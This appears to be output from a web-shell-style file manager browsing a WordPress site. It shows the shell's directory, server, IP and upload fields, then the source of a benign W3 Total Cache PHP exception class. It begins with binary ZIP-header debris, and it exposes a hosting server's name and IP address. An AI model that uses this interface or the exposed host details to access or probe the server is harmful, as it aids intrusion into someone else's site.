PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/antonkerr/www/wp-content/plugins/w3-total-cache/
Server: Linux premium47.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
IP: 68.65.123.244
Choose File :

Url:
Dir : //home/antonkerr/www/wp-content/plugins/w3-total-cache/Util_WpFile_FilesystemMkdirException.php

<?php
/**
 * File: Util_WpFile_FilesystemMkdirException.php
 *
 * @package W3TC
 */

namespace W3TC;

/**
 * Class Util_WpFile_FilesystemMkdirException
 */
class Util_WpFile_FilesystemMkdirException extends Util_WpFile_FilesystemOperationException {
	/**
	 * Folder
	 *
	 * @var string
	 */
	private $folder;

	/**
	 * Initializes the object with a message, credentials form, and folder.
	 *
	 * This constructor sets up the object by assigning values to the provided message,
	 * credentials form, and folder properties. It also invokes the parent class's constructor
	 * to initialize shared properties.
	 *
	 * @param string $message The message to associate with the object.
	 * @param string $credentials_form The credentials form content.
	 * @param string $folder The folder associated with the object.
	 */
	public function __construct( $message, $credentials_form, $folder ) {
		parent::__construct( $message, $credentials_form );

		$this->folder = $folder;
	}

	/**
	 * Retrieves the folder associated with the object.
	 *
	 * @return string The folder assigned during object initialization.
	 */
	public function folder() {
		return $this->folder;
	}
}